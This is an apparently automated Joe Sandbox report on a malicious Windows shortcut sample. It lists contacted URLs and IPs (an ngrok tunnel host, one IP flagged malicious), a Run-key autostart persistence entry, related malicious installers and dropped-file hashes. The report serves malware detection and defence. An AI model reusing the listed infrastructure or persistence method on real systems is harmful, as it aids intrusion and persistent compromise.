                                                                                                                              https://go.micropowershell.exe, 00000002.00000002.2324544978.000001BD8477C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.ver)svchost.exe, 00000006.00000002.3285480575.0000018A79400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachifontdrvhost.exe, 00000019.00000003.2682858295.000000000534B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.dropbox.com/v/s/playlist/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www-env.dropbox-dns.compowershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://permanently-removed.invalid/OAuthLoginmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://anglebug.com/4836msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://www.hellosign.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://instructorledlearning.dropboxbusiness.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
162.125.65.15 | unknown | United States | 19679 | DROPBOXUS | false
162.125.65.18 | www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
172.217.19.225 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
162.125.69.15 | edge-block-www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
3.125.209.94 | 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app | United States | 16509 | AMAZON-02US | false
162.213.210.250 | unknown | United States | 53755 | IOFLOODUS | true
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            192.168.2.7
                                                                                                                                                                                                                            192.168.2.4
                                                                                                                                                                                                                            192.168.2.5
                                                                                                                                                                                                                            127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572661
Start date and time: 2024-12-10 18:39:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: qxjDerXRGR.lnk
renamed because original name is a hash value
Original Sample Name: 72aecd00372e488060a53065258a0eb3b57cdd79db5b2afda0082ffe92ebc269.lnk
Detection: MAL
Classification: mal100.troj.evad.winLNK@82/287@21/13
EGA Information:
• Successful, ratio: 33.3%
HCA Information: Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .lnk
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 13.107.42.16, 204.79.197.239, 13.107.21.239, 172.217.19.238, 13.107.6.158, 104.110.240.201, 104.110.240.232, 2.16.158.33, 2.16.158.186, 2.16.158.192, 2.16.158.169, 2.16.158.40, 2.16.158.176, 2.16.158.184, 2.16.158.187, 2.16.158.27, 23.218.208.109, 13.87.96.169, 20.42.65.92, 199.232.210.172, 142.251.40.227, 142.251.40.99, 142.251.40.195, 52.149.20.212, 13.107.246.63, 94.245.104.56, 20.190.147.8, 23.44.133.41, 13.91.222.61, 13.107.246.40, 13.107.22.239, 172.183.192.109, 13.107.21.237
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, bzib.nelreports.net.akamaized.net, prod-agic-us-1.uksouth.cloudapp.azure.com, otelrules.azureedge.net, api.edgeoffer.microsoft.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, p
• Execution Graph export aborted for target 111392827.exe, PID 9612 because there are no executed functions
• Execution Graph export aborted for target fontdrvhost.exe, PID 9640 because there are no executed functions
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 5660 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 8496 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: qxjDerXRGR.lnk
Time      Type             Description
12:40:01  API Interceptor  189x Sleep call for process: powershell.exe modified
12:40:17  API Interceptor  2x Sleep call for process: svchost.exe modified
12:41:20  API Interceptor  1x Sleep call for process: WerFault.exe modified
18:41:04  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
18:41:12  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              qKIpxnvEyJ.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              3PALEJZmqL.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              8GPpalEkUp.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              mi8RDkNH3K.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8524657744033456
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug9:gJjJGtpTq2yv1AuNZRY3diu8iBVqF7
                                                                                                                                                                                                                                                                                              MD5:B2AE16AC6943F2B885C0D49B6EA666CB
                                                                                                                                                                                                                                                                                              SHA1:7E43C84DA84C86CD4AC7729805F8A3205C96F248
                                                                                                                                                                                                                                                                                              SHA-256:C7080462F1A01C767AF020C52F5B4D99A6100819AF268A32C19C1FA0575BB312
                                                                                                                                                                                                                                                                                              SHA-512:C15A448C33D732EED5C84EB8CC4FB598595F18AF30048724DAD90F0B695D9C9E37E099CAC7971AEABA77D5AFD4758BBBA256C6A926D6D39131DEB49E7BAE0F52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xabfe2f9e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6586063933748301
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                                                              MD5:3FCD08A6FD7AB1210501DC6B5196F35F
                                                                                                                                                                                                                                                                                              SHA1:C1C9EB89FE482495BFD164E3AEE3DB2220BE4CEF
                                                                                                                                                                                                                                                                                              SHA-256:37073E59FCFA33811F2617C67D14E3BF3D5F18686ECCA645FD73DA9BD9539370
                                                                                                                                                                                                                                                                                              SHA-512:27D2D9BF7D491DE752CD2212E9C607A15BD8322FB26D2620DF4D9C97B26B8942F2C8A50BEDF3BD315FD2950B748395CF2763DDC1B80F98E3AF15328C7407E1BF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.08130676124721575
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:xrWtKYeAmxkHtGuAJkhvekl1JdN0xk9AllrekGltll/SPj:dWtKzcHtrxlIy9AJe3l
                                                                                                                                                                                                                                                                                              MD5:3FB1415CDB29D320FE9D10507B24D35B
                                                                                                                                                                                                                                                                                              SHA1:57A44A258380FC09D081AD933B38D59706F4B860
                                                                                                                                                                                                                                                                                              SHA-256:31562EE8CFE994E24531E313F5FB48619A0E3D02E08DDDB0EA07821D236BF377
                                                                                                                                                                                                                                                                                              SHA-512:968FBC1A4C74D1B14EF4FAF071C18C325811582AAE525622C79ED7C84777C72FC2E81FDBA2A206AC0E66F3F8B4BF9666ACE50253F452C10FB8139914EE4948E9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6599267340882908
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:jAFYe3eoqigKJtts3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/y:siOvHnttxR0apYKjqzuiF3Z24lO8JO
                                                                                                                                                                                                                                                                                              MD5:FE30E9FC6F15EE44CAFB485300D686C4
                                                                                                                                                                                                                                                                                              SHA1:83B612C3518B05898B86F67D7FEDD456B38041A1
                                                                                                                                                                                                                                                                                              SHA-256:2B3E10358C4267E0380FC78B61517F6AD26F7E4190DDEA73A1E1BD26E96BB8A4
                                                                                                                                                                                                                                                                                              SHA-512:F899323E2F108B54AFDDA7034165A8BB44BA65D21B394852ACE70D733D307DF51D909E01351F8E898DADBFAE0D3EC9BF864D89F17187C2D426D98CE1DBD31B04
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:Version=1..EventType=BEX64..EventTime=133783260748471722..ReportType=2..Consent=1..UploadTime=133783260753159287..ReportStatus=524384..ReportIdentifier=c1d48269-f5e0-49c6-baab-ff5d16e42363..IntegratorReportIdentifier=1975b34c-2a4d-4df5-9d02-127026fa2f3d..Wow64Host=34404..NsAppName=fontdrvhost.exe..OriginalFilename=fontdrvhost.exe..AppSessionGuid=00002648-0001-0014-473a-8bb32a4bdb01..TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!00005efb3f97342ba195424134f28f977da9e0d6aa91!fontdrvho
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 17:41:14 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):46718
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.3092694444105664
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:5f8wY4FREZeyfrujxNVqz7i7a0YwF0Yw4AhbM6xFeUCVWItXIomt:K51r2YOqqUZNcS
                                                                                                                                                                                                                                                                                              MD5:EFD3A3B8D4A41C3F004E2EFF07F99209
                                                                                                                                                                                                                                                                                              SHA1:D49891A0263D6A7AD02D64E0087853EA4B299337
                                                                                                                                                                                                                                                                                              SHA-256:E98A93D0A5800FF2F1AF1A126E1B42852A857496F12EBFE865AFAC8F0166BD25
                                                                                                                                                                                                                                                                                              SHA-512:80BDFAAFA65840ECE663DDE5B173D3F6A9C24AD98078C8DB2ABA61CA2B532B755BD2C7704468ED738AD838D1315677EB70476C6C9B4736DB4266CA671814ABE3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8622
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6886384189924306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJT9Pq6Y8BgTvgmfr57vRpDv89biEhfp2m:R6lXJpi6YagTvgmfrFv0iifx
                                                                                                                                                                                                                                                                                              MD5:A7842015E7A53EC25CA72BC45B257696
                                                                                                                                                                                                                                                                                              SHA1:6E07F4D3EF003795B7BFB2B722C2FED8FC676651
                                                                                                                                                                                                                                                                                              SHA-256:4781176479474C25CBF99087040DB7690F485C50E0B418F2937CD193C51709D7
                                                                                                                                                                                                                                                                                              SHA-512:5B344AF548F5D0D3962B919BFB59076B5E8FA24AD40CCF370DB8C3F00FF63AA53B0102BE647C3FD9F8F990D9AE760CD6B018A4C90849D0EB4D4B13D9CACF7E6D
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>9800</Pi
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4853
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.441655574998517
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsWJg771I999huWpW8VYtYm8M4Jk5LvM6Fpyyq8vU5LvMQaMuNFd:uIjfsI7A9hP7V5JcjMayWsjMQ1u3d
                                                                                                                                                                                                                                                                                              MD5:D26F91C07F7EF03BCC5875A1B96FC05A
                                                                                                                                                                                                                                                                                              SHA1:9C5C83E021BF09718227B8711197BFD240AAB1CF
                                                                                                                                                                                                                                                                                              SHA-256:1D294EEE1C73096C112212AE3DA3B4BE761979493AD9D4CE37D91F51046D5BB2
                                                                                                                                                                                                                                                                                              SHA-512:80E1656571D0BD445DB4D7F3CEC114880859451D783F8500FF5F1F94224F14DE6F80980A98186F233EDCE60347C950266D12CE8744BCF396F7E3134DFDC3A95B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625483" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45637
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0880595982691625
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5d9fchVhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jVzC:cMk1rT8H19fZ6tIv4s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:1EA701FCB8AA11D406297FE27429181C
                                                                                                                                                                                                                                                                                              SHA1:3C8523E8D593F8050BBE2D9FE0A0F3860DB9D85A
                                                                                                                                                                                                                                                                                              SHA-256:9D4D4006D36C33A822B4238B16997A4B11AC5276026BE7D7CD6711A204B593A8
                                                                                                                                                                                                                                                                                              SHA-512:CB9EF0FC3BCDE39667D272D9FA1B342B41A6BD64544DFC7B3C8418EFF54BB6C4211E0A9BE65DABBC1C18762B8DB785C709D8E1352EFC32AF28AD7758ACE6CD80
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):44616
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.09719757233552
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBSwuohDO6vP6OBDIvlyv5XTuMTmuK7cGoup1Xl3j0:z/Ps+wsI7ynEy6tIvL7chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:7ACFFE5BBE963672BD18F1AE49C56EA1
                                                                                                                                                                                                                                                                                              SHA1:FFF2820BC48B5AF221F94D44DB8E12DC1FD1A56A
                                                                                                                                                                                                                                                                                              SHA-256:501D6FF0F797EB3F9CFB48FE3004CE7D976E09B08193B22F5B09170D0970093E
                                                                                                                                                                                                                                                                                              SHA-512:5F28D56C304B84A5083169C193035199B1BC771CB2EB218B7C973D33DD5E3E98F9CA2F30BEAEF63CF639A9B8306C0D4BE29E35B029548A8531A84EAF04C3261F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):45714
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088004726204763
                                                                                                                                                                                                                                                                                              Encrypted:false
